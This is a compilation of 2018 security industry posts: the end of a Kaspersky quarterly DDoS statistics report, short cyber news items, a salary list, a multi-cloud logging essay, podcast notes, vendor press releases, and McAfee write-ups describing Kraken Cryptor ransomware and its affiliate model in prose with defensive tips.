This, of course, may suggest that the perpetrators simply synchronize their actions with the daily pulse of the universities… But the simpler the explanation, the more likely it is: in all probability these attacks, too, are devised by the young ones, who may have quite a few “good” reasons to annoy their teachers, other students, or schools in general. Consistent with this assumption, our experts were able to find traces of DDoS attack preparations in the social networks; while our colleagues from Great Britain have come across a rather amusing case of their own: an attack targeting dorm servers was launched by a student in an attempt to defeat his online game adversary.

In all appearance, these cyclical outbursts will recur in the future – either until all educational institutions have secured themselves with impenetrable defenses, or until all students and their teachers have developed a whole new awareness of DDoS attacks and their consequences. It should be mentioned, however, that while most attacks are being organized by students, it does not mean that there aren’t any “serious” ones.

For example, launched in September, the DDoS campaign against the American vendor Infinite Campus, which provides the parent portal service for many school in its district, was so powerful and protracted as to come into notice of the US Homeland Security. It can hardly be explained by schoolchildren’s efforts alone.

Anyway, while the reasons behind the September upturn are most likely connected with the coming of the new school year, it is a bit tougher to explain the downturn. Our experts believe that most botnet owners have reconfigured their capacities towards a more profitable and relatively safer source of revenue: cryptocurrency mining.

DDoS attacks have gone a lot cheaper of late, but only for the customers. As to the organizers, their costs still run high. At the very least, one has to purchase the processing power (sometimes even to equip a data center), write a Trojan of one’s own or modify an existing one (such as the ever popular Mirai), use the Trojan to assemble a botnet, find a customer, launch the attack, etc. Not to mention that these things are illegal. And the law enforcement is up to every move: the downing of followed by a chain of arrests is a case in point.

On the other hand, cryptocurrency mining is almost legal these days: the only illegal aspect is the use of someone else’s hardware. Mining, with certain arrangements in place, being too light on the donor system to become apparent to its owner, there is not much of a chance of having to deal with cyberpolice. A cybercriminal can also repurpose the hardware they already own for mining thus escaping the attention of law enforcement altogether. For example, there were recent reports of a new botnet of MikroTik routers, originally created as a cryptocurrency mining tool. There is also indirect evidence that owners of many botnets with deservedly unsavory reputation have now reconfigured them to mining. Thus, the DDoS activities of the successful botnet yoyo have dropped very low, although there was no information about it having been dismantled.

There is a formula in logic which reads: correlation does not imply causation. In other words, if two variables change in a similar way, such changes do not necessarily have anything in common. Therefore, while it appears logical to link the growth in cryptocurrency mining with the slack in DDoS attacks in this year, this cannot claim to be the ultimate truth. Rather a working assumption.



Kaspersky Lab has a long history of combatting cyberthreats, including DDoS attacks of various types and complexities. The company’s experts monitor botnets using Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes the commands the bots receive from their management and control servers. To initiate protection it is not necessary to wait until a user device gets infected or until the attackers’ commands get executed.

This report contains DDoS Intelligence statistics for Q3 2018.

For the purpose of this report, a separate (one) DDoS attack is that during which the intervals between the botnet’s busy periods do not exceed 24 hours. For example, if the same resource was attacked by the same botnet a second time after a pause of 24 hours or more, two attacks are recorded. Attacks are also considered to be separate if the same resource is queried by bots belonging to different botnets.

The geographic locations of victims of DDoS attacks and command servers are registered based on their IPs. The report counts the number of unique DDoS targets by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics is limited to botnets detected and analyzed by Kaspersky Lab to date. It should also be remembered that botnets are but one of the tools used for DDoS attacks, and this section does not cover every single DDoS attack over the given period.

Quarter summary

  • As before, China tops the list for the highest number of attacks (78%), the US has reclaimed its second position (12.57%), Australia comes in third (2.27%) – higher than ever before. For the first time, South Korea has left the top 10 list, even though the entry threshold got much lower.
  • Similar trends are observed in distribution of unique targets: South Korea has dropped to the very bottom of the rating list; Australia has climbed to the third position.
  • In terms of number, DDoS attacks effected using botnets had their main peaks in August; the quietest day was observed in early July.
  • The number of sustained attacks has declined; however, short ones with duration of under 4 hours grew 17.5 p.p. (to 86.94%). The number of unique targets has increased by 63%.
  • The share of Linux botnets has grown only slightly from the last quarter. In this context, the by-type distribution of DDoS attacks has not changed much: SYN flood still comes first (83.2%).
  • The list of countries hosting the greatest number of command servers has changed a great deal over the last quarter. Countries like Greece and Canada, previously way out of the top 10, are now high up in the list.

Attacks geography

The top line is still occupied by China, its share having soared from 59.03% to 77.67%. The US reclaimed its second position, even though it has grown the negligible 0.11 p.p. to 12.57%. This is where the surprises begin.

First off, South Korea has tumbled out of the top 10 for the first time since monitoring began: its share shrank from 3.21% last quarter to 0.30% for a downhill ride from fourth to eleventh position. Meanwhile Australia has climbed from sixth to third place: now it accounts for 2.27% of the total number of outgoing DDoS attacks. This suggests that the growth trend for the continent, which has emerged over the past few quarters, is still there. Hong Kong descended from second to fourth position: its share plummeted from 17.13% to 1.72%.

Other than South Korea, Malaysia, too, has left the top ten; these two were replaced by Singapore (0.44%) and Russia (0.37%) – seventh and tenth places respectively. Their shares have grown but little from Q2, yet because of China’s leap the admittance threshold became somewhat less demanding. The example of France demonstrates this very well: in Q2 France was tenth with 0.43% of the total number of DDoS attacks; this quarter its share reduced to 0.39% but the country still has made it to the eighth place.

Likewise, the combined percentage of all the countries from outside the top 10 has dropped from 3.56% to 2.83%.

DDoS attacks by country, Q2 and Q3 2018 (download)

Similar processes are taking place in the unique targets rating of countries: China’s share grew 18 p.p. to 70.58%. The first five positions for the number of targets look basically the same as those for the number of attacks, but the top 10 list is a bit different: South Korea is still there, although its share shrank a great deal (down to 0.39% from 4.76%). In addition, the rating list lost Malaysia and Vietnam, replaced by Russia (0.46%, eighth place) and Germany (0.38%, tenth place).

Unique DDoS targets by country, Q2 and Q3 2018 (download)

Dynamics of the number of DDoS attacks

The beginning and end of Q3 were not abundant in attacks, yet August and early September feature a jagged graph with plenty of peaks and valleys. The biggest spikes occurred on August 7 and 20, which indirectly correlates with the dates when universities collect the applicants’ papers and announce admission score. July 2 turned out the quietest. The end of the quarter, although not very busy, was still marked with more attacks than its beginning.

Dynamics of the number of DDoS attacks in Q3 2018 (download)

The day of week distribution was fairly even this quarter. Saturday now is the most “dangerous” day of the week (15.58%), having snatched the palm from Tuesday (13.70%). Tuesday ended up second to last in terms of the number of attacks, just ahead of Wednesday, currently the quietest day of the week (12.23%).

DDoS attacks by day of week, Q2 and Q3 2018 (download)

Duration and types of DDoS attacks

The longest attack in Q3 lasted 239 hours – just short of 10 days. Just to remind you, the previous quarter’s longest one was on for almost 11 days (258 hours).

The share of mass, protracted attacks considerably declined. This is true not only for the “champions”, which lasted upward of 140 hours, but also for all the other categories down to 5 hours. The most dramatic decline occurred in the 5 to 9 hours duration category: these attacks were down to 5.49% from 14.01%.

Yet short attacks of under 4 hours grew almost 17.5 p.p. to 86.94%. At the same time, the number of targets grew 63% from the last quarter.

DDoS attacks by duration, hours, Q2 and Q3 2018 (download)

The distribution by type of attack was almost the same as the previous quarter. SYN flood has kept its first position; its share grew even more to 83.2% (from 80.2% in the second quarter and 57.3% in Q1). UDP traffic came in second; it also edged upward to settle at 11.9% (last quarter the figure was 10.6%). Other types of attacks lost a few percentage points but suffered no change in terms of relative incidence: HTTP is still third, while TCP and ICMP – fourth and fifth respectively.

DDoS attacks by type, Q2 and Q3 2018 (download)

Windows and Linux botnets have split in about the same proportion as the last quarter: Windows botnets have gone up (and Linux ones down) by 1.4 p.p. This correlates pretty well with the attack type variation dynamics.

Windows vs. Linux botnets, Q3 2018 (download)

Botnet distribution geography

There was some shakeup in the top ten list of regions with the largest number of botnet command servers. The US remained first, although its share declined from 44.75% last quarter to 37.31%. Russia climbed to the second place, having tripled its share from 2.76% to 8.96%. Greece came in third: it accounts for 8.21% of command servers – up from 0.55% and from its position way outside the top ten the previous quarter.

China, with 5.22%, is only fifth, outplayed by Canada which scored 6.72% (several times more than its own figure in Q2).

At the same time, there was a major increase in the combined share of the countries outside the top ten: up almost 5 p.p., it now stands at 16.42%.

Botnets command servers by country, Q3 2018 (download)


No major high-profile attacks were reported over the last three months. In contrast with the summer slowdown, the September’s upsurge of attacks on schools was particularly noticeable. It has become a part of the cyclic trend Kaspersky Lab has observed for many years.

Another conspicuous development is the shrinking number of protracted attacks paired with growing number of unique targets: botnet owners may be replacing large-scale offensives with small attacks (sometimes referred to in English-speaking media as “crawling” ones), often indistinguishable from the “network noise”. We have seen preludes to such change of paradigm over the previous quarters.

The top ten lineup in terms of the number of C&C botnets is being abruptly reshuffled for the second quarter in a row. It may be that the attackers try to expand into new territories or attempt to arrange for geographic redundancy of their resources. The reasons for that may be both economical (electricity prices, business robustness when exposed to unforeseen circumstances) and legal – anti-cybercrime action.

The statistics for the last two quarters has led us to believe that certain transformation processes are currently unfolding in the DDoS community, which may seriously reconfigure this field of cybercriminal activities in the near future.

Unpatched MS Word Flaw Could Allow Hackers to Infect Your Computer

Cybersecurity researchers have revealed an unpatched logical flaw in Microsoft Office 2016 and older versions that could allow an attacker to embed malicious code inside a document file, tricking users into running malware onto their computers. Discovered by researchers at Cymulate, the bug abuses the 'Online Video' option in Word documents, a feature that allows users to embedded an online

US government accuses Chinese hackers of stealing jet engine IP

The Justice Department has charged ten Chinese nationals -- two of which are intelligence officers -- of hacking into and stealing intellectual property from a pair of unnamed US and French companies between January 2015 to at least May of 2015. The hackers were after a type of turbofan (portmanteau of turbine and fan), a large commercial airline engine, to either circumvent its own development costs or avoid having to buy it. According to the complaint by the Department of Justice, a Chinese aerospace manufacturer was simultaneously working on making a comparable engine. The hack afflicted unnamed aerospace companies located in Arizona, Massachusetts and Oregon.

Via: ZD Net

Source: US Department of Justice

Top 10 Highest-Paying IT Security Roles

With cyber attacks continuously making our morning headlines, IT Security has become a concern for all organizations. In an attempt to stay secure, companies are willing to break the piggy bank for skilled professionals, so it’s no surprise salaries in this field are hitting the roof. Find out what are some of the highest-paying IT Security roles in the US.
Chief Information Security Officer | $180,000 – $300,000

C-suite executives are usually well-paid, and Chief Information Security Officers (CISOs) are no exception. They are extremely valuable to their organizations because they offer the best of both worlds: they are business savvy and own a wide range of technical skills.

Applications Security Engineer | $123,000 – $144,000

With businesses relying on all kinds of web and mobile apps, Applications Security Engineers earn big. While their salary sure looks appealing, this role requires a strong set of skills. They are in charge of an entire organization’s application security, which makes them responsible if any attack happen.

Information Security Analyst | $77,000 – $143,000

Information Security Analysts plan and carry out security measures to protect an organization’s computer networks and systems. However, their responsibilities are continually expanding as the number of cyber attacks increases every year.

Reverse Engineer | $72,000 – $139,000

By taking a piece of malware apart and studying it, Reverse Engineers can help develop new tools to combat the techniques used by malware developers, rather than reactively developing defenses for individual malware programs. Reverse engineering is widely used in computer hardware and software to enhance product features or fix certain bugs.

Data Security Analyst | $65,000 – $131,000

Data security analysts work to protect the troves of sensitive data that companies store such as credit card details, billing information, customer data, and more. There are highly valuable to a company because they are dealing directly with an organization’s most sensitive assets.

IT Security Consultant | $52,000 – $120,000

It is crucial for security consultants to have an extensive range of skills. Indeed, you never know what your client will ask next. From simple penetration tests to assistance after a breach, consultants need to know everything.
One other important skill for consultants to have is communication. You need to be able to explain to execs, without jargon, what happened and/or how to fix the issue.

Penetration Tester | $47,000 – $109,000

Penetration testers, also known as pentesters, are a very important part of a security team. These highly-skilled (ethical) hackers are responsible for finding, exploiting, and providing remediation plans for all vulnerabilities a company may have. In 2018, there is no secure organization without the help of penetration testers.

Systems Administrator | $53,000 – $106,000

According to the NIST Cybersecurity Framework, System Administrators (SysAdmins) are responsible for setting up and maintaining an entire system or specific components of a system. For example, establishing and managing user accounts, overseeing or conducting backup and recovery tasks, implementing operational and technical security controls, etc.

IT Security Specialist | $46,000 – $102,000

Computer security is of utmost importance to organizations seeking to protect their assets on the world wide web. IT Security Specialists, also called Computer Security Specialists, are responsible for protecting those assets on a day-to-day basis.

While the cybersecurity landscape evolves, an increasing number of new roles and threats are born too. This growth gives way to a deeper and deeper skill gap question that companies answer by searching for all-around industry experts – at all cost.

Want to give your IT Security career a boost and become proficient in industry-standard roles? Check out our brand-new training paths.

Source: Glassdoor | IT Career Finder | NIST

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Building a Multi-cloud Logging Strategy: Issues and Pitfalls

Posted under: Heavy Research

As we begin our series on Multi-cloud logging, we start with reasons some traditional logging approaches don’t work. I don’t like to start with a negative tone, but we need to point out some challenges and pitfalls which often beset firms on first migration to cloud. That, and it helps frame our other recommendations later in this series. Let’s take a look at some common issues by category.


  • Scale & Performance: Most log management and SIEM platforms were designed and first sold before anyone had heard of clouds, Kafka, or containers. They were architected for ‘hub-and-spoke’ deployments on flat networks, when ‘Scalability’ meant running on a bigger server. This is important because the infrastructure we now monitor is agile – designed to auto-scale up when we need processing power, and back down to reduce costs. The ability to scale up, down, and out is essential to the cloud, but often missing from older logging products which require manual setup, lacking full API enablement and auto-scale capability.
  • Data Sources: We mentioned in our introduction that some common network log sources are unavailable in the cloud. Contrawise, as automation and orchestration of cloud resources are via API calls, API logs become an important source. Data formats for these new log sources may change, as do the indicators used to group events or users within logs. For example servers in auto-scale groups may share a common IP address. But functions and other ‘serverless’ infrastructure are ephemeral, making it impossible to differentiate one instance from the next this way. So your tools need to ingest new types of logs, faster, and change their threat detection methods by source.
  • Identity: Understanding who did what requires understandings identity. An identity may be a person, service, or device. Regardless, the need to map it, and perhaps correlate it across sources, becomes even more important in hybrid and multi-cloud environments
  • Volume: When SIEM first began making the rounds, there were only so many security tools and they were pumping out only so many logs. Between new security niches and new regulations, the array of log sources sending unprecedented amounts of logs to collect and analyze grows every year. Moving from traditional AV to EPP, for example, brings with it a huge log volume increase. Add in EDR logs and you’re really into some serious volumes. On the server side, moving from network and server logs to add application layer and container logs brings a non-trivial increase in volume. There are only so many tools designed to handle modern event rates (X billio events per day) and volumes (Y terabytes per day) without buckling under the load, and more importantly, there are only so many people who know how to deploy and operate them in production. While storage is plentiful and cheap in the cloud, you still need to get those logs to the desired storage from various on-premise and cloud sources – perhaps across IaaS, PaaS, and SaaS. If you think that’s easy call your SaaS vendor and ask how to export all your logs from their cloud into your preferred log store (S3/ADLS/GCS/etc.). That old saw from Silicon Valley, “But does it scale?” is funny but really applies in some cases.
  • Bandwidth: While we’re on the topic of ridiculous volumes, let’s discuss bandwidth. Network bandwidth and transport layer security between on-premise and cloud and inter-cloud is non-trivial. There are financial costs, as well as engineering and operational considerations. If you don’t believe me ask your AWS or Azure sales person how to move, say, 10 terabytes a day between those two. In some cases architecture only allows a certain amount of bandwidth for log movement and transport, so consider this when planning migrations and add-ons.


  • Multi-account Multi-cloud Architectures: Cloud security facilitates things like micro-segmentation, multi-account strategies, closing down all unnecessary network access, and even running different workloads in different cloud environments. This sort of segmentation makes it much more difficult for attackers to pivot if they gain a foothold. It also means you will need to consider which cloud native logs are available, what you need to supplement with other tooling, and how you will stitch all these sources together. Expecting to dump all your events into a syslog style service and let it percolate back on-premise is unrealistic. You need new architectures for log capture, filtering, and analysis. Storage is the easy part.
  • Monitoring “up the Stack”: As cloud providers manage infrastructure, and possibly applications as well, your threat detection focus must shift from networks to applications. This is both because you lack visibility into network operations, but also because cloud network deployments are generally more secure, prompting attackers to shift focus. Even if you’re used to monitoring the app layer from a security perspective, for example with a big WAF in front of your on-premise servers, do you know whether you vendor has a viable cloud offering? If you’re lucky enough to have one that works in both places, and you can deploy in cloud as well, answer this (before you initiate the project): Where will those logs go, and how will you get them there?
  • Storage vs. Ingestion: Data storage in cloud services, especially object storage, is so cheap it is practically free. And long-term data archival cloud services offer huge cost advantages over older on-premise solutions. In essence we are encouraged to store more. But while storage is cheap, it’s not always cheap to ingest more data into the cloud because some logging and analytics services charge based upon volume (gigabytes) and event rates (number of events) ingested into the tool/service/platform. Example are Splunk, Azure Eventhubs, AWS Kinesis, and Google Stackdriver. Many log sources for the cloud are verbose – both number of events and amount of data generated from each. So you will need to architect your solution to be economically efficient, as well as negotiate with your vendors over ingestion of noisy sources such as DNS and proxies, for example. A brief side note on ‘closed’ logging pipelines: Some vendors want to own your logging pipeline on top of your analytics toolset. This may sound convenient because it “just works” (mostly for their business model), but beware lock-in, both in terms of cost overruns from lack of ability to deduplicate or filter pre-ingestion (the meter catches every event), but also from the opportunity cost of lost analytical capabilities other tools could provide, but not if you can’t feed them a copy of your log stream. The fact that you can afford to move a bunch of logs from place to place doesn’t mean it’s easy. Some logging architectures are not conducive to sending logs to more than one place at a time, and once you are in their system, exporting all logs (not just alerts) to another analytical tool can be incredibly difficult and resource intensive, because events can be ‘cooked’ into their own proprietary format, which you then have to reverse during export to make sense for other analytical tools.


  • What to Filter and When: Compliance, regulatory, and contractual commitments prompt organizations to log everything and store it all forever (OK, not quite, but just about). And not just in production, but pre-production, development, and test systems. Combine that with overly chatty cloud logging systems (What do you plan to do with logs of every single API call into and inside your entire cloud?), and you are quickly overloaded. This results in both slower processing and higher costs. Dealing with this problem combines deciding what must be kept vs. filtered; what needs to be analyzed vs. captured for posterity; what is relevant today for security analysis and model building, vs. irrelevant tomorrow. One of the decision points you’ll want to address earlier is what you data consider perishable/real-time vs. historical/latency-tolerant.
  • Speed: For several years there has been a movement away from batch processing, and moving to real-time analysis (footnote: batch can be very slow [days] or very fast [micro-batching within 1-2 second windows], so we use ‘batch’ to mean anything not real-time, more like daily or less frequent). Batch mode, as well as normalization and storage prior to analysis, is becoming antiquated. The use of stream processing infrastructure, machine learning, and “stateless security” enable and even facilitate analysis of events as they are received. Changing the process to analyze in real time is needed to keep pace with attackers and fully automated attacks.
  • Automated Response: Many large corporations and government agencies suffered tremendously in 2017 from fast-spreading ‘ransomworms’ (also called ‘nukeware’) such as Wannacry/NotPetya in 2017. Response models tuned for stealthy low-and-slow IP and PII exfiltration attacks need revisiting. Once fast-movers execute you cannot detect your way past the grenades they leave in your datacenter. They are very obvious and very loud. The good news is that the cloud model inherently enables micro-segmentation and automated response. The cloud also doesn’t rely on ancient identity and network protocols which enable lateral movement, and continue to plague even the best on-premise security shops. Don’t forget that bad practices in the cloud won’t save you from even untargeted shenanigans. Remember the MongoDB massacre of January 2017? Fast response to things that look wrong is key to dropping the net on the bad guys as they try to pwn you. Knowing exactly what you have, its known-good state, and how to leverage new cloud capabilities, are all advantages the blue team needs to leverage.

Again, our point is not to bash older products, but to point out that cloud environments demand you re-think how you use tools and revisit your deployment models. Most can work with re-engineered deployment. We generally prefer to deploy known technologies when appropriate, which helps reduce the skills gap facing most security and IT teams. But in some cases you will find new and different ways to supplement existing logging infrastructure, and likely run multiple analysis capabilities in parallel.

Next up in our series: Multi-cloud logging architectures and design.

-Adrian & Gal

- Adrian Lane (0) Comments Subscribe to our daily email digest

SN 687: Securing the Vending Machine

More Zero-day exploits in Windows 10, publicly exposed Docker Engine APIs, Google's plan to fix Android, the DoD is expanding its existing "Hack the Pentagon" bug-bounty program to include hardware assets, the going rate for DDoS-for-Hire, and Steve has the answer to our vending machine conundrum from last week.

We invite you to read our show notes.

Hosts: Leo Laporte and Steve Gibson

Download or subscribe to this show at

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site:, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.


Risky Business #520 — Tanya Janca talks security in the curriculum

We’ve got a great podcast for you this week. Tanya Janca will be talking about some volunteer work she’s been doing with a Canadian government panel on getting security content into children’s school curriculums.

In this week’s sponsor interview we’ll be talking with Ferruh Mavituna of Netsparker.

They launched Netsparker Cloud a while ago so now they have some decent telemetry I wanted to ask Ferruh what he’s found surprising now he’s sitting on a mountain of scan results. The types of bugs being turned up aren’t really a surprise, but the extent to which old software is a problem was actually pretty surprising to him. He knew it was bad, he says, but he didn’t know it’s this bad.

Adam Boileau, as usual, joins the show this week to talk about all the week’s security news:

  • More Chinese MSS officers indicted by the US DoJ
  • ASD chief speaks publicly on 5G Huawei ban
  • China playing funny buggers with BGP
  • Russia is still messing with the US during the midterms
  • Facebook boots more Iranian influence pages
  • New privacy features in Signal
  • Plus much, much more!

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Chinese Intelligence Officers and Their Recruited Hackers and Insiders Conspired to Steal Sensitive Commercial Aviation and Technological Data for Years | OPA | Department of Justice
U.S. charges Chinese intelligence officers for jet engine data hack
Huawei's ban to 5G network 'supported by technical advice', spy agency chief says - ABC News (Australian Broadcasting Corporation)
Canadian security boss ain't afraid of no Huawei, sees no reason for ban • The Register
US bans exports to Chinese DRAM maker citing national security risk | ZDNet
China has been 'hijacking the vital internet backbone of western countries' | ZDNet
Russia Is Meddling In The Midterms. The White House Just Isn't Talking About It.
The Crisis of Election Security - The New York Times
DHS: Election officials inundated, confused by free cyber-security offerings | ZDNet
Facebook removes more Iran-linked accounts, this time targeting the US & UK | ZDNet
We posed as 100 senators to run ads on Facebook. Facebook approved all of them. – VICE News
NYT: Chinese and Russian spies routinely eavesdrop on Trump’s iPhone calls | Ars Technica
North Korea blamed for two cryptocurrency scams, five trading platform hacks | ZDNet
New Signal privacy feature removes sender ID from metadata | Ars Technica
Windows Defender becomes first antivirus to run inside a sandbox | ZDNet
Pakistani bank denies losing $6 million in country's 'biggest cyber attack' | ZDNet
Many CMS plugins are disabling TLS certificate validation... and that's very bad | ZDNet
Twelve malicious Python libraries found and removed from PyPI | ZDNet
How ‘Mr. Hashtag’ Helped Saudi Arabia Spy on Dissidents - Motherboard
Government Spyware Vendor Left Customer, Victim Data Online for Everyone to See - Motherboard
Apple's T2 Security Chip Makes It Harder to Tap MacBook Mics | WIRED
Microsoft Windows zero-day disclosed on Twitter, again | ZDNet
Digital DASH – ICTC - Focus on Information Technology (FIT)

New platform helps enterprises manage third-party cyber risks


BetaNews, Ian Barker, October 30, 2018

Moving to digital transformation means that companies frequently have a host of vendors, suppliers, providers, and subsidiaries, all connected to their network or data and each with the potential to publicly expose customer information, intellectual property, or heavily regulated data.

Without continuous insight into these other networks third-party risks can be hard to assess, leaving businesses open to the possibility of data breaches.

Intelligence-driven security company LookingGlass is launching a new subscription-based monitoring service. This uses threat data along with a team of expert security and intelligence analysts to mitigate risks and provide continuous visibility into potential exposure.

“When it comes to risk, companies have more than just their own perimeters to consider. Every new or existing vendor increases the possibility for exposure that could lead to a breach and impact revenue, brand, and reputation,” says Eric Olson, senior vice president of product at LookingGlass Cyber Solutions. “Changing regulations that require organizations to demonstrate effective identification and management of third party relationships and associated cyber risk add even more layers of complexity to the already time-consuming task of keeping networks secure from a constant barrage of evolving inbound threats. Our Third Party Risk Monitoring service empowers security teams to effectively manage their company’s security posture by delivering the efficient, reliable analysis essential to making strategic, proactive risk management decisions.”

The LookingGlass Third Party Risk Monitoring service can be delivered as a shared or hosted service via LookingGlass or from select partners in the company’s worldwide Cyber Guardian Network. It includes round-the-clock support along with on-boarding and provisioning. In addition to continuous monitoring of third parties, it also performs perpetual scanning of the surface, social, deep, and dark web for both structured and unstructured data, including phishing activity, compromised account credentials, and vulnerabilities in vendor products.

You can find out more on the LookingGlass website.

Savannah Young
Media Associate

The post New platform helps enterprises manage third-party cyber risks appeared first on LookingGlass Cyber Solutions Inc..

NFCA 2018 Annual Training Event

NFCA 2018 Annual Training Event

The NFCA will host its 2018 Annual Training Event at the Hilton Mark Center Hotel in Alexandria, Virginia, November 6th-8th. The 2017 conference, which was a resounding success, featured a number of prominent keynote speakers including U.S. Representative and Chairman of the House Committee on Homeland Security Michael McCaul, Attorney General Jeff Sessions and Acting Department of Homeland Security Elaine Duke.

Join LookingGlass at this year’s event in booth # 118 to hear innovative ideas and business practices for the purpose of enhancing fusion center capabilities and the National Network’s contribution to public safety. We will see you there!

More Info

Our DHS Shared Cybersecurity Services are available to DHS and its components, all Federal Civilian Departments and Agencies (D/As), State Fusion Centers (SFCs), the Multi-State Information Sharing Analysis Center (MS-ISAC), and the Research Education Network Information Sharing Analysis Center (REN-ISAC).

Click below to get an online version of our DHS Cybersecurity Shared Services brochure, and be sure to stop by our booth to get a hardcopy version of the brochure!

Download Brochure

The post NFCA 2018 Annual Training Event appeared first on LookingGlass Cyber Solutions Inc..

2017 cyberattacks proved more numerous, sophisticated, and ruthless than in years past

the cyberwire

LookingGlass Cyber Solutions Software Platform Proactively Manages Third Party Cyber Risks to Business Data and Operations

ScoutPrime™ Capability Delivers Continuous Monitoring and Real-Time Discovery of Elevated Breach Risks, Helping Decision-Makers Take Action and Manage Their Expanded Cyber Attack Surface

October 30th, 2018 – RESTON, Va.–(BUSINESS WIRE)–LookingGlass™ Cyber Solutions, a leader in threat intelligence-driven security, today announced the general availability of its advanced Third Party Risk Monitoring offering. Built on the powerful ScoutPrime platform, the LookingGlass subscription service offering leverages the industry’s most comprehensive threat data along with a team of expert security and intelligence analysts to mitigate risks, provide continuous visibility into potential vendor exposure, and significantly reduce time to action with negligible false positives.


The post 2017 cyberattacks proved more numerous, sophisticated, and ruthless than in years past appeared first on LookingGlass Cyber Solutions Inc..

Kraken Ransomware Emerges from the Depths: How to Tame the Beast

Look out, someone has released the Kraken — or at least a ransomware strain named after it. Kraken Cryptor ransomware first made its appearance back in August, but in mid-September, the malicious beast emerged from the depths disguised as the legitimate spyware application SuperAntiSpyware. In fact, the attackers behind the ransomware were able to access the website and distribute the ransomware from there.

So how did this stealthy monster recently gain more traction? The McAfee Advanced Threat Research team, along with the Insikt group from Recorded Future, decided to uncover the mystery. They soon found that the Fallout Exploit kit, a type of toolkit cybercriminals use to take advantage of system vulnerabilities, started delivering Kraken ransomware at the end of September. In fact, this is the same exploit kit used to deliver GandCrab ransomware. With this new partnership between Kraken and Fallout, Kraken now has an extra vessel to employ its malicious tactics.

Now, let’s discuss how Kraken ransomware works to encrypt a victim’s computer. Kraken utilizes a business scheme called Ransomware-as-a-Service, or RaaS, which is a platform tool distributed by hackers to other hackers. This tool gives cybercriminals the ability to hold a victim’s computer files, information, and systems hostage. Once the victim pays the ransom, the hacker sends a percentage of the payment to the RaaS developers in exchange for a decryption code to be forwarded to the victim. However, Kraken wipes files from a computer using external tools, making data recovery nearly impossible for the victim. Essentially, it’s a wiper.

Kraken Cryptor ransomware employs a variety of tactics to keep it from being detected by many antimalware products. For example, hackers are given a new variant of Kraken every 15 days to help it slip under an antimalware solution’s radar. The ransomware also uses an exclusion list, a common method utilized by cybercriminals to avoid prosecution. The exclusion list archives all locations where Kraken cannot be used, suggesting that the cybercriminals behind the ransomware attacks reside in those countries. As you can see, Kraken goes to great lengths to cover its tracks, making it a difficult cyberthreat to fight.

Kraken’s goal is to encourage more wannabe cybercriminals to purchase this RaaS and conduct their own attacks, ultimately leading to more money in the developers’ pockets. Our research team observed that in Version 2 of Kraken, developers decreased their profit percentage by 5%, probably as a tactic to attract more affiliate hackers. The more criminal customers Kraken can onboard, the more attacks they can flesh out, and the more they can profit off of ransom collections.

So, what can users do to defend themselves from this stealthy monstrosity? Here are some proactive steps you can take:

  • Be wary of suspicious emails or pop-ups. Kraken was able to gain access to a legitimate website and other ransomware can too. If you receive a message or pop-up claiming to be from a company you trust but the content seems fishy, don’t click on it. Go directly to the source and contact the company from their customer support line.
  • Backup your files often. With cybercrime on the rise, it’s vital to consistently back up all of your important data. If your device becomes infected with ransomware, there’s no guarantee that you’ll get it back. Stay prepared and protected by backing up your files on an external hard drive or in the cloud.
  • Never pay the ransom. Although you may feel desperate to get your data back, paying does not guarantee that all of your information will be returned to you. Paying the ransom also contributes to the development of more ransomware families, so it’s best to just hold off on making any payments.
  • Use a decryption tool. No More Ransom provides tools to help users free their encrypted data. If your device gets held for ransom, check and see if a decryption tool is available for your specific strain of ransomware.
  • Use a comprehensive security solution. Add an extra layer of security on to all your devices by using a solution such as McAfee Total Protection, which now includes ransom guard and will help you better protect against these types of threats.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Kraken Ransomware Emerges from the Depths: How to Tame the Beast appeared first on McAfee Blogs.

Fallout Exploit Kit Releases the Kraken Ransomware on Its Victims

Alexandr Solad and Daniel Hatheway of Recorded Future are coauthors of this post. Read Recorded Future’s version of this analysis. 

Rising from the deep, Kraken Cryptor ransomware has had a notable development path in recent months. The first signs of Kraken came in mid-August on a popular underground forum. In mid-September it was reported that the malware developer had placed the ransomware, masquerading as a security solution, on the website SuperAntiSpyware, infecting systems that tried to download a legitimate version of the antispyware software.

Kraken’s presence became more apparent at the end of September, when the security researcher nao_sec discovered that the Fallout Exploit Kit, known for delivering GandCrab ransomware, also started to deliver Kraken.

The McAfee Advanced Threat Research team, working with the Insikt group from Recorded Future, found evidence of the Kraken authors asking the Fallout team to be added to the Exploit Kit. With this partnership, Kraken now has an additional malware delivery method for its criminal customers.

We also found that the user associated with Kraken ransomware, ThisWasKraken, has a paid account. Paid accounts are not uncommon on underground forums, but usually malware developers who offer services such as ransomware are highly trusted members and are vetted by other high-level forum members. Members with paid accounts are generally distrusted by the community.


Kraken Cryptor’s developers asking to join the Fallout Exploit Kit.

Kraken Cryptor announcement.

The ransomware was announced, in Russian, with the following features:

  • Encoded in C# (.NET 3.5)
  • Small stub size ~85KB
  • Fully autonomous
  • Collects system information as an encrypted message for reference
  • File size limit for encryption
  • Encryption speed faster than ever
  • Uses a hybrid combination of encryption algorithms (AES, RC4, Salsa20) for secure and fast encryption with a unique key for each file
  • Enables the use of a network resource and adds an expansion bypass mode for encrypting all files on non-OS disks
  • Is impossible to recover data using a recovery center or tools without payment
  • Added antidebug, antiforensic methods

Kraken works with an affiliate program, as do ransomware families such as GandCrab. This business scheme is often referred to a Ransomware-as-a-Service (RaaS).

Affiliates are given a new build of Kraken every 15 days to keep the payload fully undetectable from antimalware products. According to ThisWasKraken, when a victim asks for a free decryption test, the affiliate member should send one of the victim’s files with its associated unique key to the Kraken Cryptor ransomware support service. The service will decrypt the file and resend it to the affiliate member to forward the victim. After the victim pays the full ransom, the affiliate member sends a percentage of the received payment to the RaaS developers to get a decryptor key, which is forwarded to the victim. This system ensures the affiliate pays a percentage to the affiliate program and does not simply pocket the full amount. The cut for the developers offers them a relatively safe way of making a profit without exposing themselves to the risk of spreading ransomware.

